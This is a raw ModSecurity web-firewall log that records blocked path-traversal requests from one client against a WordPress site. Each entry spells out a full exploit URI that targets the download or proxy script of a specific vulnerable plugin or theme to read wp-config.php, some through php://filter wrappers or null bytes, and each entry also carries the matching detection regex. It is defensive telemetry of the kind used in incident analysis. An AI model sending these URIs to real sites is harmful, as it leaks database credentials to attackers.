[line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "ZN-xVUWc94tsnIsHAQ-YWwAAAMY"] [Fri Aug 18 12:58:45.351308 2023] [:error] [pid 19445:tid 140103359911680] [client 87.249.132.213:36272] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZN-xVUWc94tsnIsHAQ-YXAAAAMg"] [Fri Aug 18 12:58:45.465183 2023] [:error] [pid 19445:tid 140103267591936] [client 87.249.132.213:36274] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZN-xVUWc94tsnIsHAQ-YXQAAANM"] [Fri Aug 18 12:58:45.560138 2023] [:error] [pid 19445:tid 140103482758912] [client 87.249.132.213:36276] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZN-xVUWc94tsnIsHAQ-YXgAAAMI"] [Fri Aug 18 12:58:45.655288 2023] [:error] [pid 19445:tid 140103334733568] [client 87.249.132.213:36278] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2Fwp-config.php&filename=..%2F..%2Fwp-config.php&contenttype=text%2Fhtml&transient=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZN-xVUWc94tsnIsHAQ-YXwAAAMs"] [Fri Aug 18 12:58:45.751464 2023] [:error] [pid 19445:tid 140103491151616] [client 87.249.132.213:36280] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZN-xVUWc94tsnIsHAQ-YYAAAAME"] [Fri Aug 18 12:58:45.865829 2023] [:error] [pid 19445:tid 140103343126272] [client 87.249.132.213:36282] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "ZN-xVUWc94tsnIsHAQ-YYQAAAMo"] [Fri Aug 18 12:58:49.408649 2023] [:error] [pid 19445:tid 140103457580800] [client 87.249.132.213:36302] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "ZN-xWUWc94tsnIsHAQ-YZwAAAMU"] [Fri Aug 18 12:58:49.569827 2023] [:error] [pid 19445:tid 140103326340864] [client 87.249.132.213:36304] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "ZN-xWUWc94tsnIsHAQ-YaAAAAMw"] [Fri Aug 18 12:58:49.686428 2023] [:error] [pid 19445:tid 140103376697088] [client 87.249.132.213:36308] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZN-xWUWc94tsnIsHAQ-YagAAAMY"] [Fri Aug 18 12:58:49.798911 2023] [:error] [pid 19445:tid 140103267591936] [client 87.249.132.213:36310] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZN-xWUWc94tsnIsHAQ-YawAAANM"] [Fri Aug 18 12:58:53.207640 2023] [:error] [pid 18872:tid 140103376697088] [client 87.249.132.213:36330] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZN-xXfG_rKmCSnA6LxD5sgAAAAY"] [Fri Aug 18 12:58:53.302084 2023] [:error] [pid 19445:tid 140103292770048] [client 87.249.132.213:36332] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dilima/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dilima/pic.php"] [unique_id "ZN-xXUWc94tsnIsHAQ-YcwAAANA"] [Fri Aug 18 12:58:53.398676 2023] [:error] [pid 19445:tid 140103250806528] [client 87.249.132.213:36336] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php?path=..%2F..%2F..%2Fwp-config.php&type=aplication%2Fpdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php"] [unique_id "ZN-xXUWc94tsnIsHAQ-YdAAAANU"] [Fri Aug 18 12:58:54.307744 2023] [:error] [pid 19445:tid 140103359911680] [client 87.249.132.213:36340] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "ZN-xXkWc94tsnIsHAQ-YdQAAAMg"] [Fri Aug 18 12:58:54.402680 2023] [:error] [pid 18872:tid 140103317948160] [client 87.249.132.213:36342] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtheme-unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtheme-unus/css/css.php"] [unique_id "ZN-xXvG_rKmCSnA6LxD5swAAAA0"] [Fri Aug 18 12:58:55.243455 2023] [:error] [pid 19445:tid 140103309555456] [client 87.249.132.213:36346] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZN-xX0Wc94tsnIsHAQ-YdgAAAM4"] [Fri Aug 18 12:58:55.364741 2023] [:error] [pid 18873:tid 140103465973504] [client 87.249.132.213:36348] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZN-xX7CcrCl0jrDdhfxXhgAAAEQ"] [Fri Aug 18 12:58:55.464638 2023] [:error] [pid 18873:tid 140103225628416] [client 87.249.132.213:36350] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "ZN-xX7CcrCl0jrDdhfxXhwAAAFg"] [Fri Aug 18 12:58:56.335534 2023] [:error] [pid 19445:tid 140103334733568] [client 87.249.132.213:36356] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZN-xYEWc94tsnIsHAQ-YdwAAAMs"] [Fri Aug 18 12:58:56.431737 2023] [:error] [pid 18873:tid 140103474366208] [client 87.249.132.213:36358] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php%2Fwp-content%2Fplugins%2Fhb-audio-gallery-lite%2Fgallery%2Faudio-download.php%3Ffile_path%3D..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "ZN-xYLCcrCl0jrDdhfxXiQAAAEM"] [Fri Aug 18 12:58:56.526261 2023] [:error] [pid 19445:tid 140103491151616] [client 87.249.132.213:36360] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZN-xYEWc94tsnIsHAQ-YeAAAAME"] [Fri Aug 18 12:58:58.997891 2023] [:error] [pid 18874:tid 140103292770048] [client 87.249.132.213:36374] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match 